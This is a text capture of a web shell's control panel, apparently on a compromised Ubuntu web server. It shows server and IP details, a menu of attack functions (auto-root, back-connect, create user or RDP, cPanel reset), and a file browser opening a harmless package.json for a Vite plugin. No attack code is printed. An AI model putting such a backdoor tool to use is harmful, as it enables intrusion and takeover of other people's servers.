Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cqt /
node_modules /
lovable-tagger /
[ HOME SHELL ]
Name
Size
Permission
Action
dist
[ DIR ]
drwxr-xr-x
node_modules
[ DIR ]
drwxr-xr-x
README.md
213
B
-rw-r--r--
package.json
1.39
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "lovable-tagger", "version": "1.1.11", "description": "Vite plugin for component tagging", "main": "./dist/index.js", "module": "./dist/index.mjs", "types": "./dist/index.d.ts", "type": "module", "files": [ "dist" ], "scripts": { "build": "tsup src/index.ts --format cjs,esm --dts --outDir dist", "dev": "tsup src/index.ts --format cjs,esm --dts --watch", "test": "vitest", "lint": "eslint --ext .js,.ts .", "lint:fix": "eslint --ext .js,.ts --fix .", "prepublishOnly": "npm run build", "clean": "rimraf dist", "prepare": "npm run clean && npm run build", "format": "prettier --write \"src/**/*.ts\" \"tests/**/*.ts\"", "coverage": "vitest run --coverage" }, "keywords": [ "vite", "plugin", "component", "tagger" ], "author": "Emil Fagerholm", "license": "MIT", "peerDependencies": { "vite": ">=5.0.0 <8.0.0" }, "dependencies": { "@babel/parser": "^7.25.9", "@babel/types": "^7.25.8", "esbuild": "^0.25.0", "estree-walker": "^3.0.3", "magic-string": "^0.30.12", "tailwindcss": "^3.4.17" }, "devDependencies": { "@lovable/eslint-config": "file:../packages/eslint-config-lovable", "@types/babel__core": "^7.20.5", "@types/estree": "^1.0.6", "@types/node": "^22.5.5", "rimraf": "^5.0.0", "tsup": "^7.2.0", "typescript": "^5.5.3", "vitest": "^0.34.6" } }
Close